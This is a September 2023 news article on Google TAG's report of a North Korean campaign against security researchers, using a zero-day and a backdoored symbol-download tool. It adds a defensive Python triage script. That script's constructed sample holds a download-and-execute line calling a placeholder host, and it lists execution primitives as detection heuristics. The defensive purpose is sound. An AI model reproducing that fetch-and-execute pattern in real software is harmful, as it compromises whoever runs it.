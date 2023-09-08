


By Mampho Brescia

Sep 8, 2023
North Korean Cyber Campaign Targets Security Researchers, Exploits Zero-Day Vulnerability

Google’s Threat Analysis Group (TAG) has published details of a North Korean campaign that specifically targets security researchers. TAG has tracked the activity since January 2021; the most recent attacks exploit at least one zero-day vulnerability in a popular software package. Google has not named the vulnerability or the affected software, but it has reported the bug to the vendor, which is working on a patch.

In these attacks, the threat actors first make contact with a researcher on social media and then move the conversation to an encrypted messaging app. Once a relationship has been built, they send a malicious file that exploits at least one zero-day vulnerability in a widely used software package. On successful exploitation, the shellcode runs a series of anti-virtual-machine checks and then sends the collected information, along with a screenshot, to an attacker-controlled command-and-control domain.

According to John Gallagher, Vice President of Viakoo Labs at Viakoo, it is challenging to monitor and deeply investigate all interactions in the world of security research, which often relies on relationships formed over the internet. He advises organizations to adopt a “no exceptions” policy when handling software or links from outside their organization.

Beyond the zero-day, the threat actors have also built a standalone Windows tool, published as open source on GitHub, that purports to download debugging symbols from major symbol servers, including those of Microsoft, Google, Mozilla, and Citrix. The tool does fetch symbols, which makes it look legitimate, but it also has the ability to download and execute arbitrary code from an attacker-controlled domain, compromising the system of anyone who runs it.
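One practical check a researcher can run on a tool received this way, as an added example that is not taken from TAG's report or from the tool it describes: pull every URL and every process-execution primitive out of the script or binary, then flag any host that is not one of the symbol servers the tool claims to use. A fetch from an unexpected host sitting next to an execution primitive is the shape of a download-and-execute backdoor. The allowlisted hostnames, the `EXEC_MARKERS` heuristics and the `SAMPLE_TOOL` input are this example's own assumptions and constructed data, not indicators from the report.

```python
import re
import sys
from urllib.parse import urlparse

# Hostnames a symbol-download tool is expected to contact. This allowlist is an
# assumption of this example (the public symbol servers of the four vendors the
# tool claims to support), not a list taken from TAG's report.
EXPECTED_SYMBOL_HOSTS = {
    "msdl.microsoft.com",
    "chromium-browser-symsrv.commondatastorage.googleapis.com",
    "symbols.mozilla.org",
    "ctxsym.citrix.com",
}

# Strings that usually mark a "run what we fetched" primitive in scripts or
# Windows binaries. Heuristic only: a hit means "look here", not "malicious".
EXEC_MARKERS = (
    b"exec(", b"eval(", b"subprocess", b"os.system", b"CreateProcess",
    b"ShellExecute", b"WinExec", b"Invoke-Expression", b"DownloadString",
    b"rundll32",
)

URL_RE = re.compile(rb"https?://[^\s'\"<>()]+")


def _views(data: bytes) -> tuple[bytes, bytes]:
    # Windows binaries keep many strings as UTF-16LE; dropping NUL bytes turns
    # ASCII-range wide strings back into scannable text (crude but effective).
    return data, data.replace(b"\x00", b"")


def extract_urls(data: bytes) -> list[str]:
    """Return every http(s) URL found in the raw bytes or their de-NULed view."""
    found = set()
    for view in _views(data):
        for m in URL_RE.finditer(view):
            found.add(m.group(0).decode("ascii", "replace"))
    return sorted(found)


def find_exec_markers(data: bytes) -> list[str]:
    """Return the execution primitives present in either view of the data."""
    raw, wide = _views(data)
    return [m.decode() for m in EXEC_MARKERS if m in raw or m in wide]


def triage(data: bytes) -> dict:
    """Flag URLs whose host is not an expected symbol server and report whether
    the file also carries an execution primitive (download-and-execute risk)."""
    urls = extract_urls(data)
    unexpected = [u for u in urls if urlparse(u).hostname not in EXPECTED_SYMBOL_HOSTS]
    markers = find_exec_markers(data)
    return {
        "urls": urls,
        "unexpected": unexpected,
        "exec_markers": markers,
        "download_and_execute_risk": bool(unexpected) and bool(markers),
    }


# Constructed sample: a fake "symbol downloader" with a hidden self-update path.
# The .invalid domains are placeholders, not real indicators.
SAMPLE_TOOL = b"""
SYMBOL_SERVERS = ["https://msdl.microsoft.com/download/symbols",
                  "https://symbols.mozilla.org/"]
UPDATE_URL = "https://update.example.invalid/latest.bin"
def fetch_symbol(path): return download(SYMBOL_SERVERS[0] + path)
def self_update(): exec(download(UPDATE_URL))
""" + "https://telemetry.example.invalid/p\n".encode("utf-16-le")  # wide string


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_TOOL
    result = triage(blob)
    for url in result["urls"]:
        tag = "UNEXPECTED" if url in result["unexpected"] else "OK"
        print(f"{tag:10} {url}")
    print("exec markers:", result["exec_markers"] or "none")
    print("download-and-execute risk:", result["download_and_execute_risk"])
```

Run it as `python triage.py GetSymbol.py` (or against the compiled binary) before executing anything received from an untrusted contact. The check is a triage aid, not proof of safety: a tool that builds its URL at runtime or unpacks its payload will not show a plain string, so a clean result still leaves the decision to a sandboxed run or a proper reversing pass.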

The targeting of security researchers by nation-state actors such as North Korea and Russia has become more frequent and more sophisticated over the years. These operations aim not only to steal information but also to learn how defenders work, refine tradecraft, and evade future detection.

To mitigate these threats, TAG advises anyone who has downloaded or run the tool to take precautions to ensure their system is in a known-clean state, which will likely require reinstalling the operating system.

Source: Google Threat Analysis Group (TAG)

